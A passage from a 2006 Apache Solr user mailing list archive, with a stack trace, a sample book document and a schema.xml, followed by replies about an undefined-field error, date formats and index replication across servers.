status=3D"1">org.xmlpull.v1.XmlPullParserException: expected START_TAG = or END_TAG not END_DOCUMENT (position: END_DOCUMENT seen = ...&lt;/doc>\n&lt;/add>\n \n... @15:1)=0A= at org.xmlpull.mxp1.MXParser.nextTag(MXParser.java:1083)=0A= at org.apache.solr.core.SolrCore.update(SolrCore.java:680)=0A= at = org.apache.solr.servlet.SolrServlet.doPost(SolrServlet.java:81)=0A= at javax.servlet.http.HttpServlet.service(HttpServlet.java:767)=0A= at javax.servlet.http.HttpServlet.service(HttpServlet.java:860)=0A= at = org.mortbay.jetty.servlet.ServletHolder.handle(ServletHolder.java:408)=0A= at = org.mortbay.jetty.servlet.ServletHandler.handle(ServletHandler.java:350)=0A= at = org.mortbay.jetty.servlet.SessionHandler.handle(SessionHandler.java:195)=0A= at = org.mortbay.jetty.security.SecurityHandler.handle(SecurityHandler.java:16= 4)=0A= at = org.mortbay.jetty.handler.ContextHandler.handle(ContextHandler.java:536)=0A= at org.mortbay.jetty.Server.handle(Server.java:309)=0A= at org.mortbay.jetty.Server.handle(Server.java:285)=0A= at = org.mortbay.jetty.HttpConnection.doHandler(HttpConnection.java:363)=0A= at = org.mortbay.jetty.HttpConnection.access$1600(HttpConnection.java:45)=0A= at = org.mortbay.jetty.HttpConnection$RequestHandler.content(HttpConnection.ja= va:625)=0A= at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:613)=0A= at = org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:195)=0A= at = org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:297)=0A= at = org.mortbay.jetty.nio.SelectChannelConnector$HttpEndPoint.run(SelectChann= elConnector.java:680)=0A= at = org.mortbay.thread.BoundedThreadPool$PoolThread.run(BoundedThreadPool.jav= a:412)=0A= </result>=0A= <result status=3D"0"></result>=0A= =0A= =0A= -----------------=0A= <?xml version=3D"1.0" encoding=3D"UTF-8"?>=0A= <add>=0A= <doc>=0A= <field name=3D"form">book</field>=0A= <field name=3D"title">How To Care For Aging Parents</field>=0A= <field name=3D"lead">The book that answers the questions you hoped = you'd never ask. A one-stop resource for all themedical, financial, = housing, emotional, and practical issues.</field>=0A= <field name=3D"author">Morris, Virginia</field>=0A= <field name=3D"pub">Workman Publishing </field>=0A= <field name=3D"yrpublished">2004</field>=0A= <field name=3D"datetime">2006-03-23 11:48</field>=0A= <field name=3D"ref">book:999999</field>=0A= </doc>=0A= </add>=0A= =0A= ----------------=0A= <?xml version=3D"1.0" ?>=0A= <!-- The Solr schema file. This file should be named "schema.xml" and=0A= should be in the solrconf directory or located where the classloader=0A= for the Solr webapp can find it.=0A= =0A= For more information, on how to customize this file, please see...=0A= http://wiki.apache.org/solr/SchemaXml=0A= =0A= -->=0A= =0A= <schema name=3D"trial1" version=3D"1.0">=0A= <types>=0A= <!-- field type definitions. The "name" attribute is=0A= just a label to be used by field definitions. The "class"=0A= attribute and any other attributes determine the real=0A= behavior of the fieldtype. -->=0A= =0A= <!-- The StringField type is not analyzed, but indexed/stored = verbatim -->=0A= <fieldtype name=3D"string" class=3D"solr.StrField" = sortMissingLast=3D"true"/>=0A= =0A= <!-- boolean type: "true" or "false" -->=0A= <fieldtype name=3D"boolean" class=3D"solr.BoolField" = sortMissingLast=3D"true"/>=0A= =0A= <!-- The optional sortMissingLast and sortMissingFirst attributes are=0A= currently supported on types that are sorted internally as a = strings.=0A= - If sortMissingLast=3D"true" then a sort on this field will = cause documents=0A= without the field to come after documents with the field,=0A= regardless of the requested sort order (asc or desc).=0A= - If sortMissingFirst=3D"true" then a sort on this field will = cause documents=0A= without the field to come before documents with the field,=0A= regardless of the requested sort order.=0A= - If sortMissingLast=3D"false" and sortMissingFirst=3D"false" = (the default),=0A= then default lucene sorting will be used which places docs = without the field=0A= first in an ascending sort and last in a descending sort.=0A= -->=0A= =0A= =0A= <!-- numeric field types that store and index the text=0A= value verbatim (and hence don't support range queries since the=0A= lexicographic ordering isn't equal to the numeric ordering) -->=0A= <fieldtype name=3D"integer" class=3D"solr.IntField"/>=0A= <fieldtype name=3D"long" class=3D"solr.LongField"/>=0A= <fieldtype name=3D"float" class=3D"solr.FloatField"/>=0A= <fieldtype name=3D"double" class=3D"solr.DoubleField"/>=0A= =0A= =0A= <!-- Numeric field types that manipulate the value into=0A= a string value that isn't human readable in it's internal form,=0A= but with a lexicographic odering the same as the numeric = ordering=0A= so that range queries correctly work. -->=0A= <fieldtype name=3D"sint" class=3D"solr.SortableIntField" = sortMissingLast=3D"true"/>=0A= <fieldtype name=3D"slong" class=3D"solr.SortableLongField" = sortMissingLast=3D"true"/>=0A= <fieldtype name=3D"sfloat" class=3D"solr.SortableFloatField" = sortMissingLast=3D"true"/>=0A= <fieldtype name=3D"sdouble" class=3D"solr.SortableDoubleField" = sortMissingLast=3D"true"/>=0A= =0A= =0A= <!-- The format for this date field is of the form = 1995-12-31T23:59:59Z, and=0A= is a more restricted form of the canonical representation of = dateTime=0A= http://www.w3.org/TR/xmlschema-2/#dateTime=0A= The trailing "Z" designates UTC time and is mandatory.=0A= Optional fractional seconds are allowed: = 1995-12-31T23:59:59.999Z=0A= All other components are mandatory. -->=0A= <fieldtype name=3D"date" class=3D"solr.DateField" = sortMissingLast=3D"true"/>=0A= =0A= <!-- solr.TextField allows the specification of custom text analyzers=0A= specified as a tokenizer and a list of token filters. Different=0A= analyzers may be specified for indexing and querying.=0A= =0A= The optional positionIncrementGap puts space between multiple = fields of=0A= this type on the same document, with the purpose of preventing = false phrase=0A= matching across fields.=0A= =0A= For more info on customizing your analyzer chain, please see...=0A= http://wiki.apache.org/solr/AnalyzersTokenizersTokenFilters=0A= =0A= -->=0A= =0A= <!-- Standard analyzer commonly used by Lucene developers -->=0A= <fieldtype name=3D"text_lu" class=3D"solr.TextField" = positionIncrementGap=3D"100">=0A= <analyzer>=0A= <tokenizer class=3D"solr.StandardTokenizerFactory"/>=0A= <filter class=3D"solr.StandardFilterFactory"/>=0A= <filter class=3D"solr.LowerCaseFilterFactory"/>=0A= <filter class=3D"solr.StopFilterFactory"/>=0A= <filter class=3D"solr.EnglishPorterFilterFactory"/>=0A= </analyzer>=0A= </fieldtype>=0A= <!-- One could also specify an existing Analyzer implementation in = Java=0A= via the class attribute on the analyzer element:=0A= <fieldtype name=3D"text_lu" class=3D"solr.TextField">=0A= <analyzer = class=3D"org.apache.lucene.analysis.snowball.SnowballAnalyzer"/>=0A= </fieldType>=0A= -->=0A= =0A= <!-- A text field that only splits on whitespace for more exact = matching -->=0A= <fieldtype name=3D"text_ws" class=3D"solr.TextField" = positionIncrementGap=3D"100">=0A= <analyzer>=0A= <tokenizer class=3D"solr.WhitespaceTokenizerFactory"/>=0A= </analyzer>=0A= </fieldtype>=0A= =0A= <!-- A text field that uses WordDelimiterFilter to enable splitting = and matching of=0A= words on case-change, alpha numeric boundaries, and = non-alphanumeric chars=0A= so that a query of "wifi" or "wi fi" could match a document = containing "Wi-Fi".=0A= Synonyms and stopwords are customized by external files, and = stemming is enabled -->=0A= =0A= <fieldtype name=3D"text" class=3D"solr.TextField" = positionIncrementGap=3D"100">=0A= <analyzer type=3D"index">=0A= <tokenizer class=3D"solr.WhitespaceTokenizerFactory"/>=0A= =0A= <!-- in this example, we will only use synonyms at query time=0A= <filter class=3D"solr.SynonymFilterFactory" = synonyms=3D"index_synonyms.txt" ignoreCase=3D"true" expand=3D"false"/>=0A= -->=0A= =0A= <filter class=3D"solr.StopFilterFactory" ignoreCase=3D"true"/>=0A= <filter class=3D"solr.WordDelimiterFilterFactory" = generateWordParts=3D"1" generateNumberParts=3D"1" catenateWords=3D"1" = catenateNumbers=3D"1" catenateAll=3D"0"/>=0A= <filter class=3D"solr.LowerCaseFilterFactory"/>=0A= <filter class=3D"solr.EnglishPorterFilterFactory" = protected=3D"protwords.txt"/>=0A= </analyzer>=0A= <analyzer type=3D"query">=0A= <tokenizer class=3D"solr.WhitespaceTokenizerFactory"/>=0A= <filter class=3D"solr.SynonymFilterFactory" = synonyms=3D"synonyms.txt" ignoreCase=3D"true" expand=3D"true"/>=0A= <filter class=3D"solr.StopFilterFactory" ignoreCase=3D"true"/>=0A= <filter class=3D"solr.WordDelimiterFilterFactory" = generateWordParts=3D"1" generateNumberParts=3D"1" catenateWords=3D"0" = catenateNumbers=3D"0" catenateAll=3D"0"/>=0A= <filter class=3D"solr.LowerCaseFilterFactory"/>=0A= <filter class=3D"solr.EnglishPorterFilterFactory" = protected=3D"protwords.txt"/>=0A= </analyzer>=0A= </fieldtype>=0A= =0A= =0A= <!-- Less flexible matching, but less false matches. Probably not = ideal for product names=0A= but may be good for SKUs. Can insert dashes in the wrong place = and still match. -->=0A= =0A= <fieldtype name=3D"textTight" class=3D"solr.TextField" = positionIncrementGap=3D"100" >=0A= <analyzer>=0A= <tokenizer class=3D"solr.WhitespaceTokenizerFactory"/>=0A= <filter class=3D"solr.SynonymFilterFactory" = synonyms=3D"synonyms.txt" ignoreCase=3D"true" expand=3D"false"/>=0A= <filter class=3D"solr.StopFilterFactory" ignoreCase=3D"true"/>=0A= <filter class=3D"solr.WordDelimiterFilterFactory" = generateWordParts=3D"0" generateNumberParts=3D"0" catenateWords=3D"1" = catenateNumbers=3D"1" catenateAll=3D"0"/>=0A= <filter class=3D"solr.LowerCaseFilterFactory"/>=0A= <filter class=3D"solr.EnglishPorterFilterFactory" = protected=3D"protwords.txt"/>=0A= </analyzer>=0A= </fieldtype>=0A= =0A= </types>=0A= =0A= =0A= <fields>=0A= <!-- Valid attributes for fields:=0A= name: mandatory - the name for the field=0A= type: mandatory - the name of a previously defined type from the = <types> section=0A= indexed: true if this field should be indexed (searchable)=0A= stored: true if this field should be retrievable=0A= multiValued: true if this field may contain multiple values per = document=0A= omitNorms: (expert) set to true to omit the norms associated with = this field=0A= (this disables length normalization and index-time = boosting for the field)=0A= -->=0A= =0A= <field name=3D"ref" type=3D"string" indexed=3D"true" stored=3D"true"/>=0A= <field name=3D"form" type=3D"string" indexed=3D"true" = stored=3D"true"/>=0A= <field name=3D"title" type=3D"text" indexed=3D"true" stored=3D"true"/>=0A= <field name=3D"pub" type=3D"text" indexed=3D"true" stored=3D"true"/>=0A= <field name=3D"lead" type=3D"text" indexed=3D"true" stored=3D"true"/>=0A= <field name=3D"author" type=3D"text" indexed=3D"true" = stored=3D"true"/>=0A= <field name=3D"yrpublished" type=3D"sint" indexed=3D"false" = stored=3D"true"/>=0A= =0A= <field name=3D"datetime" type=3D"date" indexed=3D"true" = stored=3D"true"/>=0A= <field name=3D"category" type=3D"string" indexed=3D"true" = stored=3D"true" multiValued=3D"true"/>=0A= <field name=3D"state" type=3D"string" indexed=3D"true" = stored=3D"true"/>=0A= =0A= <!-- catchall field, containing all other searchable text fields = (implemented=0A= via copyField further on in this schema -->=0A= =0A= <field name=3D"text" type=3D"text" indexed=3D"true" stored=3D"false" = multiValued=3D"true"/>=0A= =0A= <!-- Dynamic field definitions. If a field name is not found, = dynamicFields=0A= will be used if the name matches any of the patterns.=0A= RESTRICTION: the glob-like pattern in the name attribute must = have=0A= a "*" only at the start or the end.=0A= EXAMPLE: name=3D"*_i" will match any field ending in _i (like = myid_i, z_i)=0A= Longer patterns will be matched first. if equal size patterns=0A= both match, the first appearing in the schema will be used. -->=0A= =0A= <dynamicField name=3D"*_i" type=3D"sint" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_s" type=3D"string" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_l" type=3D"slong" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_t" type=3D"text" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_b" type=3D"boolean" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_f" type=3D"sfloat" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_d" type=3D"sdouble" indexed=3D"true" = stored=3D"true"/>=0A= <dynamicField name=3D"*_dt" type=3D"date" indexed=3D"true" = stored=3D"true"/>=0A= =0A= </fields>=0A= =0A= <!-- field to use to determine and enforce document uniqueness. -->=0A= =0A= <uniqueKey>ref</uniqueKey>=0A= =0A= <!-- field for the QueryParser to use when an explicit fieldname is = absent -->=0A= =0A= <defaultSearchField>text</defaultSearchField>=0A= =0A= <!-- copyField commands copy one field to another at the time a = document=0A= is added to the index. It's used either to index the same field = different=0A= ways, or to add multiple fields to the same field for = easier/faster searching.=0A= -->=0A= =0A= <copyField source=3D"form" dest=3D"text"/>=0A= <copyField source=3D"title" dest=3D"text"/>=0A= <copyField source=3D"author" dest=3D"text"/>=0A= <copyField source=3D"lead" dest=3D"text"/>=0A= =0A= <!-- Similarity is the scoring routine for each document vs a query.=0A= A custom similarity may be specified here, but the default is fine=0A= for most applications. -->=0A= <!-- <similarity class=3D"org.apache.lucene.search.DefaultSimilarity"/> = -->=0A= =0A= </schema>=0A= ------=_NextPart_000_0005_01C6517C.B452AEF0-- From [email protected] Mon Mar 27 16:17:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13078 invoked from network); 27 Mar 2006 16:17:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 16:17:46 -0000 Received: (qmail 22996 invoked by uid 500); 27 Mar 2006 16:17:45 -0000 Delivered-To: [email protected] Received: (qmail 22927 invoked by uid 500); 27 Mar 2006 16:17:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22882 invoked by uid 99); 27 Mar 2006 16:17:45 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 08:17:45 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 08:17:44 -0800 Received: by pproxy.gmail.com with SMTP id s49so1334892pyc for <[email protected]>; Mon, 27 Mar 2006 08:17:22 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=QMbc9/kiQMci1dBg2cDr+WwEOQmv1vJJq4uQacU0Vqtwvf8PGhtxjWYxjsRXbvrO6SPzouUWux6tx49Ysq/dLsnIIUOFeGm/Iwz8XxBARRtGGNMHO40DBc1SHVvD8rQ3GsuOtxKZAVDdwzIkAMM3zGQa4ZjJPns3F7NwndAV0js= Received: by 161.129.204.104 with SMTP id p18mr1189752pyj; Mon, 27 Mar 2006 08:17:21 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 27 Mar 2006 08:17:21 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 11:17:21 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: What is proper way to re-init index? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi John, The error message "undefined field form" means Solr doesn't know about the "form" field. Did you copy your schema.xml to the example/solrconf directory and restart the app server? I tried your schema and doc, and didn't get the error you did. I got an error further down due to and invalid date format (see schema.xml comments for date type for the correct format). -Yonik (the weird stack trace showing an XML parsing error is due to Solr trying to continue on to the next document even though the first had an error... and it looks like this part of the code could use a little work). From [email protected] Mon Mar 27 16:23:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18876 invoked from network); 27 Mar 2006 16:23:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 16:23:52 -0000 Received: (qmail 35706 invoked by uid 500); 27 Mar 2006 16:23:52 -0000 Delivered-To: [email protected] Received: (qmail 35647 invoked by uid 500); 27 Mar 2006 16:23:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35635 invoked by uid 99); 27 Mar 2006 16:23:51 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 08:23:51 -0800 X-ASF-Spam-Status: No, hits=0.9 required=10.0 tests=HTML_10_20,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 08:23:51 -0800 Received: by zproxy.gmail.com with SMTP id 16so747245nzp for <[email protected]>; Mon, 27 Mar 2006 08:23:30 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=XBXw6HM5nBk7sDk9qdkSRK/kyJl48pMoGJKptifkgM7JQwVDsJHxHNvsb7NFhlA3oqn+HgDFblZVlRSi7dg6gfHbhkPbR+LdbCgOzDk/jxYfPhTpOVuyS9lIK1GzknQrsnX23dpHSeozGqUozSJQs7OInYzOJ/o6oWWzf+zZzXo= Received: by 161.129.204.104 with SMTP id y3mr1172107qbd; Mon, 27 Mar 2006 08:23:30 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 27 Mar 2006 08:23:30 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 11:23:30 -0500 From: "Clay Webster" <[email protected]> To: [email protected], "jason rutherglen" <[email protected]> Subject: Re: To cluster, or not to cluster... In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4448_22973582.1143476610320" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_4448_22973582.1143476610320 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Jason, I'm not following why you suggesting having multiple masters (and updating multiple masters). I can see an advantage and lots of disadvantages. What is the problem you're suggesting this could address? --cw ------=_Part_4448_22973582.1143476610320-- From [email protected] Mon Mar 27 16:33:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26839 invoked from network); 27 Mar 2006 16:33:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 16:33:12 -0000 Received: (qmail 67015 invoked by uid 500); 27 Mar 2006 16:33:12 -0000 Delivered-To: [email protected] Received: (qmail 66956 invoked by uid 500); 27 Mar 2006 16:33:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66947 invoked by uid 99); 27 Mar 2006 16:33:11 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 08:33:11 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 08:33:10 -0800 Received: by zproxy.gmail.com with SMTP id 16so749293nzp for <[email protected]>; Mon, 27 Mar 2006 08:32:50 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=eGLH37E3S2YjqWr94a75gyghs/27GssQbP8eCLAMcG8+vVYT+ns2K+4LrKOqafhFvLXv5ShyZW9cWKoeZl+aBeaLOfyJXwVEb1h5CCnq3bQyzNs+nujOyBoOcb/T7uC/2XtA8pu3eBs5hJCTdEpQhSCDiFmERwgP4ClpQTSAq4k= Received: by 161.129.204.104 with SMTP id y15mr2009006qbh; Mon, 27 Mar 2006 08:32:49 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 27 Mar 2006 08:32:49 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 11:32:49 -0500 From: "Clay Webster" <[email protected]> To: [email protected] Subject: Re: Multiple updates possible? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4680_22572770.1143477169450" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_4680_22572770.1143477169450 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Further, I'd discourage anyone from using NFS for their read/write index location. I don't know about Windows either, but I'd think there could be similar non-atomic issues with windows fileshares. That's even in the case where you have one RW and the others are reads. --cw On 3/24/06, Chris Hostetter <[email protected]> wrote: > > > : In this case we are looking at having multiple tomcats to provide us > : with load balancing and failover. We are not looking at a master/slave > : index solution. We'll also be working on windows. > > I'm not very faimilar with windows, but if your goal is to have load > balanced servers for failover, then what is the advantage of running thos= e > multiple servers on the same box (pointed at teh same index directory)? > ... if the box goes down, you're up a creek. > > what we do is have one master port that recieves all of the updates and > has a postCommit hook which makes snapshots. then we have many slave > ports (running on other machines) which pull the snapshots at regular > intervals, and are all accessible behind a load balancer. > > if one slave goes down -- no big deal, the load balancer stops using it. > > if the master goes down, the slaves happily keep serving queries, but new > updates can't be published untill we install a "master" configuration > (with thepostCommit hook) on one of the slaves, and change the DNS record > for the master to point at that slave -- at which point it because the > new master. > > I know the existing snapshotter/snappuller scripts in subversion don't > work on windows, but one of the items on the task list is to try and come > up with equivilent methods that can -- if you have any ideas on how that > can be achieved that would be great! > > > > > -Hoss > > ------=_Part_4680_22572770.1143477169450-- From [email protected] Mon Mar 27 18:38:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 945 invoked from network); 27 Mar 2006 18:38:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 18:38:02 -0000 Received: (qmail 55211 invoked by uid 500); 27 Mar 2006 18:38:02 -0000 Delivered-To: [email protected] Received: (qmail 55138 invoked by uid 500); 27 Mar 2006 18:38:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55128 invoked by uid 99); 27 Mar 2006 18:38:01 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:38:01 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rwcrmhc14.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:38:00 -0800 Received: from andy (c-68-52-221-224.hsd1.tn.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc14) with SMTP id <20060327183739m1400sklf6e>; Mon, 27 Mar 2006 18:37:39 +0000 From: "John Mohr" <[email protected]> To: <[email protected]> Subject: RE: What is proper way to re-init index? Date: Mon, 27 Mar 2006 12:36:36 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) In-Reply-To: <[email protected]> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 Importance: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N So why wouldn't the "form" field be recognized? It's in the schema (immediately after "ref"). In the meantime I'll play around with date. The comments say it should be: "2006-03-27T12:36:00Z". Unless I hear otherwise I'll assume that's correct. -----Original Message----- From: Yonik Seeley [mailto:[email protected]] Sent: Monday, March 27, 2006 10:17 AM To: [email protected] Subject: Re: What is proper way to re-init index? Hi John, The error message "undefined field form" means Solr doesn't know about the "form" field. Did you copy your schema.xml to the example/solrconf directory and restart the app server? I tried your schema and doc, and didn't get the error you did. I got an error further down due to and invalid date format (see schema.xml comments for date type for the correct format). -Yonik (the weird stack trace showing an XML parsing error is due to Solr trying to continue on to the next document even though the first had an error... and it looks like this part of the code could use a little work). From [email protected] Mon Mar 27 18:42:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2692 invoked from network); 27 Mar 2006 18:42:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 18:42:02 -0000 Received: (qmail 63202 invoked by uid 500); 27 Mar 2006 18:42:01 -0000 Delivered-To: [email protected] Received: (qmail 63155 invoked by uid 500); 27 Mar 2006 18:42:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63121 invoked by uid 99); 27 Mar 2006 18:42:01 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:42:01 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:42:00 -0800 Received: by pproxy.gmail.com with SMTP id s49so1404838pyc for <[email protected]>; Mon, 27 Mar 2006 10:41:39 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=bDqyHeqTrC4JwlKjjAIGZaSRyqigGI19LsRaD/LQGN39z0awfiU0Ie0nVDnl56vteTbUdQ7MKC73lBziuETktpM8RNnBickwJv+yhY6nFAVVnfwu5Zd++/qQsKN63q2P74iN3KOkws2+CfOpkHVG19g1Ctk/0SYTw4lWanAq0Vk= Received: by 161.129.204.104 with SMTP id o13mr1871322pyj; Mon, 27 Mar 2006 10:41:39 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 27 Mar 2006 10:41:39 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 13:41:39 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: What is proper way to re-init index? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/27/06, John Mohr <[email protected]> wrote: > So why wouldn't the "form" field be recognized? Your schema is correct, I tried it myself and it worked. My best guess is that Solr isn't actually reading your schema.xml, but the example one. Are you sure solrconf/schema.xml is your schema, and that you restarted the server so it would be re-read? -Yonik > -----Original Message----- > From: Yonik Seeley [mailto:[email protected]] > Sent: Monday, March 27, 2006 10:17 AM > To: [email protected] > Subject: Re: What is proper way to re-init index? > > > Hi John, > > The error message "undefined field form" means Solr doesn't know about > the "form" field. > Did you copy your schema.xml to the example/solrconf directory and > restart the app server? > > I tried your schema and doc, and didn't get the error you did. I got > an error further down due to and invalid date format (see schema.xml > comments for date type for the correct format). > > -Yonik > > (the weird stack trace showing an XML parsing error is due to Solr > trying to continue on to the next document even though the first had > an error... and it looks like this part of the code could use a little > work). > From [email protected] Mon Mar 27 18:46:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6445 invoked from network); 27 Mar 2006 18:46:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 18:46:53 -0000 Received: (qmail 67750 invoked by uid 500); 27 Mar 2006 18:46:53 -0000 Delivered-To: [email protected] Received: (qmail 67735 invoked by uid 500); 27 Mar 2006 18:46:53 -0000 